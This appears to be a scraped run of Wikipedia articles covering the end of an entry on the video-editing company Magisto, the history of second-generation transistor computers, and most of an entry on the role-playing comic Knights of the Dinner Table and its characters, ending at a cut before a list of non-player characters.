In February 2014 Magisto claimed that they had 20 million users, with 2 million new users per month. The company also confirmed investment from Russian internet company, Mail.Ru Group. In September 2014 Magisto rolled out a new feature called, ‘Instagram Ready’ which allows users to upload 15 second clips that are automatically formatted for Instagram. In the same month Magisto also launched a new feature for iOS and Android users, called ‘Surprise Me’ which creates video from still photographs on users’ smartphones. In October 2014, Magisto was placed 9th on the 2014 Deloitte Israel Technology Fast 50 list, as one of the fastest-growing technology companies, and was named as a finalist in the Red Herring's Top 100 Europe award.
In January 2015, Magisto participated in a statistical analysis on the habits of smartphone users in conjunction with Gigaom. In July 2015, Magisto released an editing theme dedicated to musician Jerry Garcia, endorsed by his daughter Trixie.
In April 2019, the company was acquired by Vimeo, the IAC-owned platform for hosting, sharing and monetizing streamed video, for an estimated .
Funding rounds
In 2010, the company received more than $5.5 million in Series A round and B venture round funding from Magma Venture Partners and Horizons Ventures.
In September 2011, at the same time as the public launch of their web application, Magisto announced a $5.5 million Series B funding round led by Li Ka-shing’s Horizons Ventures. Li Ka-Shing is known for making early-stage investments in companies like Facebook, Spotify, SecondMarket and Siri.
In 2014, the company received $2 million in Venture Funding from Magma Venture Partners, Qualcomm Ventures, Horizons Ventures and the Mail.Ru Group.
Business model
Magisto has a freemium business model: Users can create basic video clips for free. In addition, advanced business, professional and personal service tiers are available via various subscription plans, unlocking additional capabilities (such as longer videos, HD, premium themes), sophisticated customization and control features that improve the quality and precision of their AI powered editing.
Awards
Magisto won first place at Technonomy3, an annual Internet Technology start-up competition in Israel. Judges of the competition included Jeff Pulver, TechCrunch editor Mike Butcher, investor Yaron Samid, Bessemer Venture Partners Israel partner Adam Fisher and Brad McCarty of The Next Web.
Magisto won first place at CES 2012 Mobile app competition, during the launch of Magisto iOS mobile app.
Magisto was awarded twice the Google Play Editors Choice and was part of iPhone App Store Best App awards for 2013 and 2014, and Wired Essential iPad Apps.
Magisto was declared by Deloitte as the 7-th fastest growing companies in EMEA in 2016.
See also
Video editing
Video server
Edit Decision List
Photo slideshow software
Video scratching
Video editing software
Comparison of video editing software
List of video editing software
Web application
Web Processing Service
High-definition video
References
External links
Vimeo
Film and video technology
Video processing
Software architecture
Magisto
Web development
Software companies of the United States
|
12289014
|
https://en.wikipedia.org/wiki/Transistor%20computer
|
Transistor computer
|
A transistor computer, now often called a second-generation computer, is a computer which uses discrete transistors instead of vacuum tubes. The first generation of electronic computers used vacuum tubes, which generated large amounts of heat, were bulky and unreliable. A second-generation computer, through the late 1950s and 1960s featured circuit boards filled with individual transistors and magnetic core memory. These machines remained the mainstream design into the late 1960s, when integrated circuits started appearing and led to the third-generation computer.
History
The University of Manchester's experimental Transistor Computer was first operational in November 1953 and it is widely believed to be the first transistor computer to come into operation anywhere in the world. There were two versions of the Transistor Computer, the prototype, operational in 1953, and the full-size version, commissioned in April 1955. The 1953 machine had 92 point-contact transistors and 550 diodes, manufactured by STC. It had a 48-bit machine word. The 1955 machine had a total of 200 point-contact transistors and 1300 point diodes, which resulted in a power consumption of 150 watts. There were considerable reliability problems with the early batches of transistors and the average error-free run in 1955 was only 1.5 hours. The Computer also used a small number of tubes in its clock generator, so it was not the first fully transistorized machine.
The design of a full-size Transistor Computer was subsequently adopted by the Manchester firm of Metropolitan-Vickers, who changed all the circuits to use more reliable junction transistors. The production version was known as the Metrovick 950 and was built from 1956 to the extent of six or seven machines, which were "used commercially within the company" or "mainly for internal use".
Other early machines
During the mid-1950s a series of similar machines appeared. These included the Bell Laboratories TRADIC, completed in January 1954, which used a single high-power output vacuum-tube amplifier to supply its 1-MHz clock power.
The first fully transistorized computer was either the Harwell CADET, which first operated in February 1955, although the price paid for this was that it operated only at the slow speed of 58 kHz, or the prototype IBM 604 transistor calculator. The Burroughs Corporation claimed the SM-65 Atlas ICBM / THOR ABLE guidance computer (MOD 1) that it delivered to the US Air Force at the Cape Canaveral missile range in June 1957 was "the world's first operational transistorized computer". MIT's Lincoln Laboratory started developing a transistorized computer the TX-0 in 1956.
Further transistorized computers became operational in Japan (ETL Mark III, July 1956), in Canada (DRTE Computer, 1957), and in Austria, (Mailüfterl, May 1958), these being the first transistorized computers in Asia, Canada and mainland Europe respectively.
First commercial fully transistorized calculator
In April 1955, IBM announced the IBM 608 transistor calculator, which was first shipped in December 1957. IBM and several historians thus consider the IBM 608 the first all solid-state computing machine commercially marketed. The development of the 608 was preceded by the prototyping of an experimental all-transistor version of the 604. This was built and demonstrated in October 1954, but was not commercialized.
Early commercial fully transistorized large-scale computers
The Philco Transac models S-1000 scientific computer and S-2000 electronic data processing computer were early commercially produced large-scale all-transistor computers; they were announced in 1957 but did not ship until sometime after the fall of 1958. The Philco computer name "Transac" stands for Transistor-Automatic-Computer. Both of these Philco computer models used the surface-barrier transistor in their circuitry designs, the world's first high-frequency transistor suitable for high-speed computers. The surface-barrier transistor was developed by Philco in 1953.
RCA shipped the RCA 501 its first all transistor computer in 1958.
In Italy, Olivetti's first commercial fully transistorized computer was the Olivetti Elea 9003, sold from 1959.
IBM
IBM, which dominated the data processing industry through most of the 20th century, introduced its first commercial transistorized computers beginning in 1958, with the IBM 7070, a ten-digit-word decimal machine. It was followed in 1959 by the IBM 7090, a 36-bit scientific machine, the highly popular IBM 1401 designed to replace punched card tabulating machines, and the desk-sized 1620, a variable length decimal machine. IBM's 7000 and 1400 series included many variants on these designs, with different data formats, instruction sets and even different character encodings, but all were built using the same series of electronics modules, the IBM Standard Modular System (SMS).
DEC
Developers of the TX-0 left to form the Digital Equipment Corporation in 1957. Transistorized from the beginning, early DEC products included the PDP-1, PDP-6, PDP-7 and early PDP-8s, the last starting the minicomputer revolution. Later models of the PDP-8 beginning with PDP-8I in 1968 used integrated circuits making them third generation computers
System/360 and hybrid circuits
In 1964, IBM announced its System/360, a collection of computers covering a wide range of capabilities and prices with a unified architecture, to replace its earlier computers. Unwilling to bet the company on the immature monolithic IC technology of the early 1960s, IBM built the S/360 series using IBM's Solid Logic Technology (SLT) modules. SLT could package several individual transistors and individual diodes with deposited resistors and interconnections in a module one-half inch square, roughly the equivalent logic of the earlier IBM Standard Modular System card, But unlike monolithic IC manufacturing, the diodes and transistors in an SLT module were individually placed and connected at the end of each module's assembly.
Schools and hobbyists
First generation computers were largely out of reach of schools and hobbyists who wished to build their own, largely because of the cost of the large number of vacuum tubes required (though relay-based computer projects were undertaken). The fourth generation (VLSI) was also largely out of reach, too, due to most of the design work being inside the integrated circuit package (though this barrier, too, was later removed). So, second and third generation computer design (transistors and SSI) were perhaps the best suited to being undertaken by schools and hobbyists.
See also
History of computing hardware
List of transistorized computers
References
|
260928
|
https://en.wikipedia.org/wiki/Knights%20of%20the%20Dinner%20Table
|
Knights of the Dinner Table
|
Knights of the Dinner Table (KoDT) is a comic book/strip created by Jolly R. Blackburn and published by Kenzer & Company. It primarily focuses on a group of role playing gamers and their actions at the gaming table, which often result in unfortunate, but humorous consequences in the game. The name is a parody of King Arthur's Round Table reinforced by the truism that roleplaying aficionados often end up sitting round their host's dinner table as it is the only one large enough to accommodate the party (4 to 8 people typically).
The comic
The panels are written by Blackburn, and given that he had no formal art training, the characters are drawn in simple caricatures which are scanned onto a computer and are continuously reused. Many of the stories presented in KoDT are based on actual in-game experiences of the developers or readers, who are encouraged to submit story ideas. Part of the comic's popularity stems from the reader's ability to relate to the characters and their experiences. KoDT has won the Origins Awards for Best Professional Game Magazine of 1998 and 1999. KoDT has also won the Origins Award for Best Game Accessory of 2009.
It also won the Origins Award Gamer's Choice: Best Periodical of 2003.
Publication history
In Shadis #2 (March/April 1990), then editor Jolly Blackburn decided to draw a simple strip of his own to put on the last page which he called Knights of the Dinner Table, which depicted the humorous interactions of a gaming group. When Blackburn published that first Knights strip, he thought that he was just filling a blank page but when he tried to replace it with more professional strips beginning with Shadis #6, there was an outcry; because of that outcry Knights soon returned. Blackburn also published Knights of the Dinner Table as a comic book, the first three issues of which appeared from his company Alderac Entertainment Games over the next year (1994-1995). As a result of diverging interests with his partners, Blackburn left Alderac in 1995, with Shadis #21 (December 1995) being his final issue; he kept the rights to Knights of the Dinner Table. Blackburn formed a new company called KODT Enteractive Facktory, which was to publish the Knights of the Dinner Table comic monthly. While he was working on getting that new company together, Blackburn received a call from the editor of TSR's Dragon magazine, asking if the Knights of the Dinner Table strip was now available; although Blackburn originally planned to continue the strip in Shadis, he accepted the offer and Knights of the Dinner Table thus began appearing beginning in Dragon #226 (February, 1996), a run that lasted through issue #269 (March 2000), when it was replaced by and expanded Nodwick strip.
While working on Knights of the Dinner Table #4 (1996), Blackburn concluded that he really did not want to go it alone, and David Kenzer and the staff of Kenzer & Company wanted to get Blackburn to join their company. In November 1996 when David Kenzer and others were visiting Blackburn over the course of a local con, and Blackburn decided that Kenzer had the sort of business sense and integrity that he was looking for in a partner. Starting with issue #5 (February 1997) Knights of the Dinner Table was the work of the "KoTD Development Team" which consisted of Jolly Blackburn, David Kenzer, Brian Jelke and Steve Johansson.
Characters
The Knights of the Dinner Table
The main group of characters are the members of a gaming group known as "The Knights of the Dinner Table" in a fictionalized version of Muncie, Indiana. The players' best-known and most often-used characters are the HackMaster characters known as the "Untouchable Trio (Plus One)" (abbreviated as "UT+1"). They consist of:
Boris Alphonzo "B.A." Felton
B.A. is the GM and current organizer of the Knights (although the group was founded, and GMed, by Brian). In his 30s, he lives with his mother due to a failed attempt at game design, and works at the local pizza shop known as the Pizza-A-Go-Go, as well as his father's dry cleaning shop. B.A. has a bad reputation among the Knights for being ruthlessly cunning, largely because the players tend to be paranoid and to react poorly to setbacks, and any attempt at normal gameplay usually ends in misery (or complete and utter disaster). He often finds his games thwarted or sabotaged by the antics of the other players, much to his dismay.
He is also a sucker for the local game-shop owner, "Weird Pete" Ashton (see "The Black Hands Gaming Society", below), who constantly finds ways to sell him new or over-stocked product, on the basis that it's just what B.A. needs to spice up his campaigns. B.A. was supposedly based on Jolly Blackburn himself. B.A. from late 2005 to early 2006 took a furlough from GMing, having seen too many of his hard-worked campaigns reduced to rubble, the last such disaster prior to his furlough being a difficult situation revolving around two self-aware swords. His place behind the GM screen was temporarily taken by Brian VanHoose. B.A.'s return to the gamemaster's seat was heralded by his acquisition of a copy of the infamously deadly Temple of Horrendous Doom HackMaster scenario created by "Weird Pete". Now he's taken up a more hardball approach in the hopes of reining in the power gaming that wrecked most of his previous adventures.
Robert Samuel "Bob" Herzog
Bob lives for gaming. He's a member of the "Old School" style of playing which revolves around killing people and breaking things. His short temper has led him into trouble on many occasions. He reacts to most encounters with "I waste him/her/it with my crossbow!". Bob is extremely protective of his large dice collection. At one point, Bob came into conflict with his father over gaming, given the option to straighten up and give up gaming, or move out. Being the true gamer, Bob did indeed move out, and is currently attempting to live on his own, but tends to spend his rent money on gaming paraphernalia. Bob's favourite character in fantasy campaigns is a dwarf named Knuckles (ranging from Knuckles, King of the Wall-climbers to Knuckles the Eighth), who rides a mule named "Little Mike" which he believes to be a "Dwarven Warhorse."
Bob is in a relationship with Sheila Horowitz, a member of another Muncie gaming group, the Dorm Troopers; recent issues have shown the two apparently living together. Bob currently works for Weird Pete at the till, getting paid in gaming stock each week, because Weird Pete cannot afford to pay him in actual money. Bob has little qualms with this arrangement, and has even made Sara compliment him on how enthusiastic he is.
David "Dave" Harcord Bozwell
The youngest of the Knights, Dave is a student at Ball State University, where he studies Cultural Anthropology and Dance Theory (the latter of the two for the purpose of meeting girls). He originally used to show up for the food, but really got into the game despite a bad first encounter with Johnny (a former Knight who gouged Dave out of a priceless gem). Dave is the typical "Hack-N-Slash" player, who becomes bored easily in non-action situations. When faced with talking things through (at which he is poor), or fighting, Dave chooses the latter. Dave, until recently, played a character by the name of El Ravager, wielding a coveted Hackmaster +12 sword named "Tremble". He lusts to own a god-level Magic Sword, but dreads the possibility of such a blade having its own ideas of what it is to be used for.
More recently (late 2006) in B.A.'s newest campaign, Dave has changed tactics (in part thanks to B.A.'s new hardball rules) and is playing a magic-user named El Mardico with, it must be said, some margin of success. Brian has therefore provided Dave with tutelage on how to properly run a mage – for a small fee. Dave was once involved with local Game Master Patty Gauzweiller; he later broke it off but she still had feelings for him, leaving him a target for her flirtatious tactics. This, however, seems to have disappeared with time.
Sara Ashlyn Felton
B.A.'s cousin Sara, the only female member of the group, prefers games with a focus on role playing rather than the pure action. Often, she tries to solve issues in-game through negotiation, while the others prefer violence. Exactly how she, playing a 'good' character, came to unleash upon the game-world a blood-thirsty pack of pit bulls to attack and devour anything alive they come across (and quite a few not-alive things as well) is an entirely different story, and one Sara would like the world to forget about (even if she never will). Usually the voice of reason, Sara has reflexes that would scare a striking cobra and has been known to have a hair-trigger temper on certain subjects (sexist remarks being perhaps the foremost); Bob, Dave and Brian have all had their shirt collars wrenched by a fuming Sara at least once.
Sara's trademark characters are generally (fully clothed) female barbarians, the most noteworthy of which are probably Zayre and Thorina. She also has the distinction of being the person that broke Brian's undefeated streak at Risque (a parody of Risk). Brian is not fond of being reminded of this. Sara was supposedly based on Jolly Blackburn's wife, Barbara Blackburn.
Brian Montgomery VanHoose
Brian is the rules lawyer and powergamer of the group. A web designer and miniature painter, he lives alone in a house inherited from his parents. He can quote rules and supplements down to page and paragraph/footnote numbers, and bend and abuse this knowledge to his advantage, at times at the expense of other players. He meticulously hands down notes of earlier adventures to his characters' descendants, thereby giving them in-game access to knowledge they otherwise would not possess, and has been known to tattoo his character's spells on fellow party-members backs as a contingency plan, making them into walking grimoires. Brian is another person said to keep a grudge so long he has a regular account at the taxidermists' shop. In addition, when he does get pushed too far (either by a carefully constructed plot falling apart or a bout of in-game backstabbing), he has been known to flip the table in a moment of rage.
His weaknesses include a miserly streak that makes him charge other players 15 cents apiece for character sheets (and non-KoDT affiliated gamers 25 cents), and a love for dogs that can lead to B.A. leading him by the nose towards traps and misfortunes. Brian's trademark characters are wizards, all bearing the name Lotus. His most well-known character is known as Teflon Billy, but this was a nickname given by the group to a character originally named Black Lotus (Black Lotus gives BL which gives Billy, and "Teflon" refers to the uncanny skill of the character at avoiding damage). Formerly a renowned Game-Master, he abandoned the GM's Screen after an unspecified incident at a convention, but has recently taken it up again (after B.A. was burned out by repeated trashings of his best efforts in GMing), to run a complex Cattlepunk campaign. This campaign terminated with the sudden reversal of Brian's meticulous plans, at the hands of an alliance between B.A. and Sara, and an unexpected role-reversal, (from cringing dupe to back-shooting plotter) on the part of Bob's character; Brian threw the reins back to B.A., returning to the role of player, saying that he had only GM'd in order to keep his HMPA-GM credentials fully valid.
Brian has also appeared as a tragic character more than once; in his youth, his parents were killed in a car crash, and his uncle managed his inheritance until he turned eighteen. Living on his own, he concocts elaborate fantasies which he narrates to the other players about being taken globetrotting by his uncle for Christmas, or having a girlfriend (see Alexis Marie below), sometimes even making bogus phone calls or actually booking hotel rooms to strengthen the illusion. In one extreme case, Brian has been portrayed as role-playing a date with a doll, which he referred to as "Sara"; in another, when the Knights had met for pizza and were drawing from a prop Deck of Many Things that Brian made and imagining what would happen if the deck was real and affected their real lives, Brian drew the card "the Void" ("Body functions, but soul is trapped elsewhere"), and responded with "That pretty much describes my life already." It has also been suggested Brian's state may be linked to the fact that Brian previously ran six separate campaigns every week, and was paid for GMing, and further that there may be links between this and "the incident" which caused Brian to give up GMing. Recent issues have not mentioned this aspect of the plot, and it may have been dropped, as a number of reader's letters suggested that readers found these developments too disturbing.
On a number of occasions (such as the doll incident mentioned above), Brian has displayed evidence of a severe crush on Sara; he has not, however, ever openly acknowledged this to her.
The Black Hands Gaming Society
Usually represented as the "evil" counterpart to the Knights, as most of their games revolve around the PCs finding reasons to kill each other before completing the intended adventure. Their membership consists of players who have been rejected from all other local groups, and hence they remain together simply because none of them has anywhere else to go. They are far more results-oriented than the Knights, enforcing demerit policies when Weird Pete is behind the GM screen (often worked off by unpaid labor behind Weird Pete's counter), and holding extensive post-mortems on their game sessions, to see where things could have been done better (usually by the members of the group not slaughtering one another's characters for minor infractions of local "rules", to vent a real-life grudge, or to gain experience points needed to advance their own character a level or two). They are especially prone to do this to "new" charactersmost all of them have a psychological "button" which triggers a desire to execute a character based solely on race, attitude or type of clothing (e.g. looking like the character might be an assassin).
Victor "Nitro" Fergueson – Former Marine and the current GM of the Black Hands; he resorts to increasingly contrived methods to keep the group in order, including using demerits, using incentives, and forcing players to wear "hubcaps of shame" if warranted. Supposedly earned his name after an incident taking part in the steam tunnels under the local University where Nitro attempted to run a "live action" session. For some reason yet to be fathomed, Nitro has a habit of using deceased celebrities of cult-like status as NPCs in most, if not all, of his games (Andy Warhol, his apparent favorite, springs up everywherein HackMaster, Nitro placed him as the primary deity of his campaign setting, Kraag Wurld). Has little tolerance for stupidity and sucking up (usually done at the same time by Newt), and can quickly slip into a drill sergeant-esque tirade that would make R. Lee Ermey proud. Nitro was supposedly based on a real person who Jolly met at a gaming club, who really was nicknamed Nitro.
Pete Ashton – known to the gaming community as "Weird Pete"; owner of the local game shop, the "Games Pit" (originally called the "Games Pit Stop"). A player in the Black Hands, although he has occasionally acted as GM for both them and other groups in the comic, usually running his trademark "never-completed" adventure The Temple Of Horrendous Doom (a reference of a pair of real D&D modules, Tomb Of Horrors and The Temple of Elemental Evil) which "no-one has ever completed without dying". In fact, the majority of the adventure requires players to take control of disembodied spirits; thus "dying" and being reborn is part and parcel of completing the adventure. Weird Pete generally forces players to sign a non-disclosure contract before playing as he enjoys the mystique that has evolved around the adventure. Weird Pete also devised a "demerit" system for penalizing players when he is GMing, which can be worked off with time running the front counter of the "Games Pit".
Weird Pete is a ruthless salesman and has no qualms about feeding his friends and customers a line of bull about the virtues of his wares; he has a particular talent for convincing B.A. that a given product or service is just what B.A. needs for his game. However, Pete is also a poor businessman, willing to shell out for whatever seems to be "the next big thing" and taking the fall when the product flops; he is often as vulnerable to the sales pitches of game manufacturers as his customers are to his own "salesmanship".
Newt Forager – a small and rather whiny and tricky player who invariably plays evil, mysterious loners with hidden agendas, all of whom are blood related so that he can share in-game information between them. The only child of a career military family, Newt bounced from base to base while he was youngperhaps the reason he has a hard time making friends. He has gravitated to the Black Hands because no other group will let him in (he played once with B.A. and the Knights when Bob was unable to game, and proceeded to try and rob everybody just to load up on treasure and experience for another GM's game he was aiming for). Since joining the Black Hands he has acquired an ongoing hatred of Stevil, mostly due to in-game interpersonal warfare and vendettas. Newt's first appearances with the Black Hands were initially believed to be examples of "newbie-bashing" (mistreatment of players who are new to a game or group, and are thus at a disadvantage) by several KODT readers; however, the creators behind the Knights point out that Newt's anti-social and selfish tendencies both in and out of character put him on an even footing with the Black Hands from the start, and that sooner or later, Newt invariably gives as good as he gets where his fellow players are concerned.
Gordo Sheckberry – a more roleplay focused player who usually plays female characters, most notably female pixie fairies who are dramatically underpowered compared to the other characters in the campaign. Gordo uses a wheelchair and has full lifetime disability, but considers this a bonus as it enables him to game almost daily with different groups. He is easily recognized by his Coke-bottle glasses and bad toupee. Gordo has a degree in Chemical Engineering, and is rumored to have cooked up the batch of C-4 used in an attempt to breach the steam tunnels (the incident that gave Nitro his nickname).
Stevil Van Hostle – also known as Stevil Van Hostile, Evil Stevil or Bitter Stevil, Stevil is a tech-support worker who commutes from Indianapolis to game sessions and is quick and vicious to jump on any grudge in the game (sometimes accompanied by his signature gripe, "I can't believe I drove forty-five frickin' miles for THIS!"). On occasions, he has been known to deliberately trash entire parties and campaigns simply because another player's character won over on him. He has an ongoing grudge against Newt which started when Newt first joined the group; Stevil's character challenged Newt's to "swing at him with a stick" to test his combat prowess (after Newt refused to describe his character in game-statistic terms). Newt's character knocked out Stevil's with his first blow and it was discovered that Stevil had assumed that a "stick" would be a small twig or similar, whereas the "stick" Newt's character had actually used was a full-length pole resembling a log. Outside the Black Hands' table, Newt merely brags he knocked Stevil out with an ordinary stick, which only serves to further annoy Stevil.
Hard Eight Enterprises
In the KODT world, Hard Eight Enterprises are the creators of the Hackmaster, Cattlepunk, Space Hack, and Scream of Kachooloo gaming systems. Well respected by all of Muncie's gaming groups (USUALLY anyway), they call the shots. Hard Eight Enterprises run the tournament-level Hackmaster games in the semi-finals, which one year resulted in the disqualification of the Black Hands, and the Untouchable Trio (Plus One) causing Timmy Jackson to cry. Hard Eight runs the annual Garycon game convention; there is now a real-world convention with this name, held in memory of Gary Gygax in Lake Geneva, Wisconsin.
Gary Jackson – President and founder of Hard Eight, Gary Jackson designed and created Hackmaster (a parody of Dungeons & Dragons). His name combines those of Gary Gygax and Steve Jackson, two noted RPG designers. Gary Jackson has always been two things—first and foremost a gamer, but second and not distantly behind that at all: a business man. Some of Hard 8's best and worst products were the design of Gary, including the One-Legged Dwarf Kits. Gary has a son by the name of Timmy (Timmy Jackson in full), who also is involved in the family business. However, Timmy is somewhat young, and a lot of the ideas he comes up with are met with spite and disgust. Gary Jackson allegedly died in issue #53 in a plane crash. Because of controversy surrounding the new edition of Hackmaster, Brian and Bob got into a vehicle and drove up to Hard Eight to confirm. Despite their shock and horror at his "death," the two rubbed several of their dice on Gary (believed to endow good luck, they in fact cursed the dice). Suddenly, in issue #149, Gary emerged from hiding (after having faked his own death to avoid gambling debts), and started his own game company, purchasing several of his game lines from Hard Eight, now controlled by Heidi. Eventually, he merges his new company with Hard Eight, recombining their old intellectual properties, but must work under Heidi, who still owns it.
Heidi Jackson – estranged wife of Gary Jackson and owner of a regular publishing company, Paperback Werks, and owner of Hard Eight since the (faked) death of Gary Jackson – although she rarely actually showed up at Hard Eight, instead holding telephone conferences with the staff. Heidi is a hard-nosed businesswoman who cares nothing for games or gamers, and imposed continuously harsher deadlines for Hard Eight to show greater and greater profit margins, having threatened to close down the company more than once if it fails to show sufficient growth. Many of the employees dislike Heidi, but Jo Jo (below) has accepted that her business attitude is only acknowledging and dealing with a weakness that was already there. Heidi began demanding changes in Hackmaster to the point it resembled one of the romance/adventure novels her company publishes. (Some changes suggested by Heidi appear to be not-so-subtle jabs at the recent, real-world alterations made to Dungeons & Dragons 4th Edition.) After Heidi sold off several Hard Eight assets to have them purchased secretly by Gary, Gary found that his employees had signed Non-compete clause contracts with Heidi. Gary was able to "charm" Heidi into re-merging the companies.
Timmy Jackson – Son of Gary and Heidi Jackson. Over the years, Timmy earned the nickname of "Table Happy," because of his munchkin ways. He was also referred to on occasion as "Timmy the Rules Mangler." Timmy was intended to one day inherit Hard Eight. Timmy used to participate in the creation of gaming systems, including Cattlepunk. However, Timmy was a munchkin (i.e. power gamer) and his products had poor reputations. Following the return of Gary Jackson, it has been implied that Timmy has lost interest in role-playing games and has grown into a typical teen jock, more interested in football and girls.
Jo Jo Zeke – Jo Jo was (until his supposed demise) Gary Jackson's best friend and he assumed daily management of Hard Eight after Gary's "death." Jo Jo was once forced to accompany Timmy Jackson to host a Hackmaster tournament because Gary was busy. In the aftermath, Jo Jo grabbed a then-crying Timmy and retreated back to Hard Eight as fast as possible. Everyone found out why very quickly, for the prize of the tournament turned out to be a $1500 certificate for One-Legged Dwarf Kits and Spelljacked cards. This development enraged even those who had lost the tournament, and a riot broke out. Jo Jo was pressed by the Hard Eight staff to stand up to Heidi Jackson's more ridiculous changes to HackMaster. Jo Jo presented their case and was subsequently fired. He created his own gaming company, but was then brought back on board when Gary returned.
Patty's Perpetrators
Patty's Perpetrators (Patty's Perps for short) are one of the newest sanctioned groups in Muncie recognized by the HMPA . Patty's Perps have the stigma of being the very bottom of the barrel (i.e. they take in those who no one else will accept, like Crutch).
Patty Gauzweiller – currently teaches a Kindergarten class in Muncie. She used to belong to the Black Hands before forming Patty's Perpetrators (or more commonly "Patty's Perps"). She often brings her "teaching tools" from her classroom to the gaming table (time outs, for example). Patty used to be in a relationship with Dave. They dated for a number of months before Dave decided to break up with her. In more recent times, after a series of misunderstandings and an eventual co-GM arrangement with B.A. during a massive PvP war at the Knights' table, surprisingly, Patty and B.A. appear to be on the road to an actual relationship.
Leslie "Crutch" Humphries – Crutch is an ex-con who's gotten two "strikes" and been put on notice. If he commits a crime again, he goes to prison for good. He's often found at Hawg Wallers (though legally he is not allowed to be in bars by the terms of his probation, the police don't usually go to Hawg's). Despite his criminal record, it's apparent to those who know him that he mostly has a good heart. He is a very loyal friend—though he often gets in trouble for his loyalty. Crutch discovered role-playing by accident, when he mistook a game of Cattlepunk the Black Hands were playing in Hawg Wallers for an actual meeting to plan a heist; when he was told the truth, he decided he would like to see how the heist turned out in the game anyway and was hooked on Cattlepunk. However, Crutch also had a social stigma of being cutthroat and was rejected from the Knights, as well as from the Black Hands. He finally found a home with Patty's Perps, although he had to try hard to earn the acceptance and approval of the other players. He has learned much about fantasy role-playing and teamwork with fellow players in his time with the Perps, and in a recent Hackmaster Tournament/Grudge Match, Crutch was the only member of the group to advance to the finals. Moreover, it was his act of self-sacrifice that enabled Sara Felton (another finalist among the three teams that called the Grudge Match) to reach the final goal and win the game. Crutch eventually became an HMA certified gamemaster, drawing on his criminal background to run a surprisingly popular (and extremely lethal) Crime Nation campaign.
Mona "Mo" Wert – Mona has a lot of time to game since her children are grown up and she received a large inheritance from a great-uncle, as well as her husband's departure. She is proud of "answering to no one" and being a "free spirit". She is honest, blunt, and rather ruthless, but most people still consider her enjoyable to be around. In her spare time she does volunteer work and met Patty working at her kindergarten.
Eddie "Tank" Ramirez – Eddie acquired the nickname "Tank" in high school as the League Commissioner for his Fantasy Football League. He is very proud of his character – Kraven the Frost Giant thief. He believes he is the only player in the country playing a giant thief, although there are rumors that someone in Belize is playing a Hill Giant assassin. He has assumed the role of Crutch's "tutor", teaching him the intricacies of roleplaying and "playing well with others". As a child, Eddie was extremely shy, and Patty's Perps was the only group that accepted him. Patty has been working on "coaxing him out of his shell" and he started working out at Nitro's gym regularly after she offered in-game incentives for exercising.
Chad Aguilar – Chad is a graduate student as Ball State University, and working as a disc jockey to get needed money. He's known for having a short temper – he is often sent to Patty's time-out corner, and if he goes out prematurely, he'll lose a level. When he started playing Hackmaster, his age (13) made it difficult to find an accepting group, but he was accepted in Patty's group. He plays now with his love interest, Reese, who is a naive vegan peacenik completely unsuited for the brutal world of Hackmaster. After having a baby son ("Peeta...") they ended up sharing a pixie fairy character with multiple personalities.
Other groups
The Dorm Troopers, Logan's Heroes and Slacker's Hackers are part of some of the other local gaming groups across whom the Knights come at intervals, most notably in the incident of the Player Exchange Program (and resulting intergroup grudge match). In this, certain Game Masters conspired to arrange for the annihilation of competing groups' characters (so that their bodies could be looted for plunder) by switching players into other groups' games where, separated from their regular comrades, they could be killed off. The ultimate plan was to eliminate competition in an upcoming local HackMaster tournament, as well as use any magic items and other enhancements looted from other characters to win the tourney.
Other notable characters from the Muncie gaming community include
Bridgette Keating, a beautiful woman who wears skimpy costumes at conventions and delights in using her appearance to manipulate the "geeks" (not least by involving them in the LARP "Vampyres: Lords of Darkness" and then using them for manual labor).
Earl Slackmozer, an occasional freelancer for Hard Eight Enterprises and a one-time rival of B.A. B.A. didn't care for one of Earl's modules and the two butted heads for a while, but have since learned to respect each other (more or less).
Sheila Horowitz was introduced to gaming at the Knights' table (though never became an official member of the group) while dating Dave Bozwell, and once got in a fistfight with B.A. when he accused her of in-game cheating. She is currently a member of the Dorm Troopers, and is cohabitating with Bob Herzog. Sheila is arguably a vital part of Bob's maintaining his independence from his father, as she initially took something of a "mother hen" attitude with Bob. Since moving in together, it is clear that Sheila is the dominant personality in the relationship, limiting Bob's spending money and assigning him household chores (although, also, at the latest GaryCon, covertly arranging for Bob to fulfill his ambition to win a giant D20, even if she did then have to manipulate him into not displaying it on a table where she kept a family photograph). This relationship took a dramatic nosedive after Bob got suckered into a couple of Brian's schemes to 'get one over' on Hard 8, culminating in Bob losing Sheila's trust over rent money spent on Hacker-Snacks.
Hunter and Croix are Bob Herzog's nephew and niece (respectively), whom he has introduced to gaming. Hunter was part of Nitro's PeeWee team that competed in HackMaster tournaments, and later appeared in Wave 1 of Bob Herzog's intercampaign invasion during the PvP war against Carvin' Marvin, Brian, and Sara.
Two fictional groups that are frequently referenced in stories are the Hackmaster Association for gamemasters (HMA) and Hackmaster Players' Association for players (HMPA). They act as networking organizations for the two types of participant, perform lobbying activities on behalf of their groups to Hard Eight Enterprises (e.g., to advocate for rule changes that benefit their members), arbitrate disputes, and issue rulings that are binding on their members. The HMA also serves as an accreditation body for gamemasters. The HMA and HMPA are examples of the exaggerated level of organization of the RPG hobby in the comic; another is the fictional Gamer Temps company that provides, for a fee, drop-in temporary players for campaigns when a regular player is absent (minor character Ty Ferfel was introduced as a Gamer Temps employee).
Miscellaneous characters
Characters who are not part of a gaming group.
Squirrely – Weird Pete's pet chimpanzee, he can be considered a security measure. Squirrely is actually a hyper-intelligent experimental animal formerly of a U.S. Government research facility; how he escaped is somewhat of a mystery, and one Weird Pete will likely never solve- mainly because he doesn't know or even care. He works as sort of a gofer at the Games Pit, running errands on his scooter or sorting inventory. He has, on occasions, sat in at the Knights' table, substituting for one of the regulars (though never (so far) for Sara or Brian). He tends to do very well, because Weird Pete keeps his cage in the room he lets gamers hire for sessions, so Squirrely (who games as "Squire Lee", a name Pete had also used to apply for a credit card) has seen most of the commercial modules played already, and knows where the treasure, monsters and traps are. Squirrely is also a rather heavy smoker—something that can create friction at the Knights' table, due to Brian's bad reactions (either physically or psychosomatically allergic) to cigarette smoke.
Erik Bouchard – A Canadian gamer who showed up at Gary Jackson's funeral and rubbed dice on Gary, right in front of the entire Hard 8 Staff. He later appeared as a "hired gun" during the grudge match that resulted from the Player Exchange Program.
In-game (non-player) characters
The Knights themselves have encountered several recurring non-player characters in their (various) roleplaying campaigns. Among these are:
